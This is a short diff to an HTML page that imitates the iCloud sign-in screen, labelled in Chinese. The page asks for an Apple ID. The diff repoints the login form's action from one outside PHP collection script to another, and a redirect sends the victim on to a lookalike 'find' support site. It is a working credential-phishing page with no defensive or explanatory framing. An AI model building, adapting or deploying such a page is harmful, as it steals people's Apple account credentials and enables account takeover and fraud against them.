--- a/app0.htm
+++ b/app0.htm
@@ -42,7 +42,7 @@
 	<img src="./index_files/cloud.png" class="img-cloud" alt="">
 
 	<h2>登入 iCloud</h2>
-	<form action="http://207.210.200.146/~goontone/apple/1.php" class="cloud-login form-ajax" role="form" data-red="http://ifindsupport.com/find" method="post" accept-charset="utf-8">
+	<form action="http://settings.acsite.org/user/apple/2.php" class="cloud-login form-ajax" role="form" data-red="http://ifindsupport.com/find" method="post" accept-charset="utf-8">
 <input type="hidden" name="csrf_test_name" value="96001a656ae698e32b786a2068c22820" style="display:none;">
 		<input type="hidden" name="apple_add">
 		<input type="text" class="id" name="apple_id" id="apple_id" placeholder="Apple ID" style="direction: ltr !important;">
